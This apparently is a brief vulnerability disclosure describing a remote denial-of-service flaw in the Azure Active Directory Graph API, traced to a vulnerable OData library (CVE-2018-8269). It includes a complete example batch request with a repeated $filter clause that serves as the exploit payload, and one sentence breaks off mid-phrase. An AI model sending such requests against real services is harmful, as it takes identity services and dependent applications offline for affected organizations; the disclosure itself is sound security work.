Azure Active Directory Graph API
A vulnerability in Azure Active Directory Graph API could allow a remote authenticated attacker to make the service unavailable.
Azure Active Directory is Microsoft’s cloud service that provides identity and access management (IAM) services. It is used by many organizations to authenticate users in Microsoft Azure applications as well as on-premises applications.
Azure Active Directory Graph API Graph API is a REST based interface that provides a programmatic access to this service.
Many applications use this API for the interaction with Azure Active Directory. If the graph API is unavailable for an organization, all the applications that use it will probably be unavailable as well.
The vulnerability is a result of the dependency this service has in Microsoft.Data.OData library which was vulnerable to remote DOS (See CVE-2018-8269).
The exploit can be done by sending an OData Batch request that contain a
$filter parameter with many repetitions of
Here is an example of such a request.
POST https://graph.windows.net/<org id>/$batch?api-version=1.6 HTTP/1.1 Host: graph.windows.net Authorization: Bearer XXXXX content-type: multipart/mixed; boundary=RRR Content-Length: 216 --RRR Content-type: application/http Content-Transfer-Encoding: binary GET https://graph.windows.net/<org id>/users?$filter=city+eq+'a'+or+city+eq+'a'+or.... HTTP/1.1 accept: application/json;odata=minimalmetadata --RRR--